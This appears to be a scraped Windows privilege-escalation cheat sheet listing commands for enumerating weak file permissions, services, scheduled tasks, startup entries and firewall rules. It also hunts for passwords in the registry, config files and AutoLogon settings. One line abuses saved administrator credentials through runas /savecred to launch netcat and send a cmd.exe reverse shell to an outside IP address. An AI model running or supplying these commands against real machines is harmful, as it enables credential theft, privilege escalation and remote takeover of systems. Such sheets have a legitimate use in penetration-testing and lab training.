Common Windows Utilities
cmdkey /list
|
1 2 |
runas /savecred /user:DOMAIN\Administrator “cmd /k C:\Users\security\tmp\nc.exe -d 10.10.14.17 1233 -e cmd.exe “ |
accesschk – find writable dirs and files
|
1 2 |
accesschk32.exe -qwsu "username" C:\* /ACCEPTEULA |
Look for Weak folder and file permissions
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
icacls “C:\Program Files\*” 2>nul | findstr “(F)” | findstr “Everyone” icacls “C:\Program Files (x86)\*” 2>nul | findstr “(F)” | findstr “Everyone” icacls “C:\Program Files\*” 2>nul | findstr “(F)” | findstr “BUILTIN\Users” icacls “C:\Program Files (x86)\*” 2>nul | findstr “(F)” | findstr “BUILTIN\Users” accesschk.exe -qwsu “Everyone” * accesschk.exe -qwsu “Authenticated Users” * accesschk64.exe -qwsu “Users” * |
Look for running services and processes
|
1 2 3 4 5 6 7 8 |
tasklist /svc tasklist /v net start sc query |
Look for any custom Scheduled Tasks
|
1 2 3 4 |
schtasks /query /fo LIST 2>nul | findstr TaskName dir C:\windows\tasks |
Look for startup programs
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
wmic startup get caption,command reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce dir “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” dir “C:\Documents and Settings\%username%\Start Menu\Programs\Startup” |
Is Firewall turned on and which rules are configured
|
1 2 3 4 5 6 7 8 |
netsh firewall show state netsh firewall show config netsh advfirewall firewall show rule name=all netsh advfirewall export “firewall.txt” |
Look for password entries in registry
|
1 2 3 4 |
reg query HKCU /f password /t REG_SZ /s reg query HKLM /f password /t REG_SZ /s |
Look for interesting files in specific folders
|
1 2 |
dir /s *pass* == *vnc* == *.config* 2>nul |
Findstr – Search for string in all files
|
1 2 3 |
findstr /s /i /m password .xml .ini .txt .config *.php findstr /S /I /C:"/password" "." |
Look for files that contain password entries
|
1 2 3 4 |
Findstr /si password *.xml *.ini *.txt *.config 2>nul Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern “password” |
Show if User AutoLogon is configured
|
1 2 |
reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” 2>nul | findstr “DefaultUserName DefaultDomainName DefaultPassword” |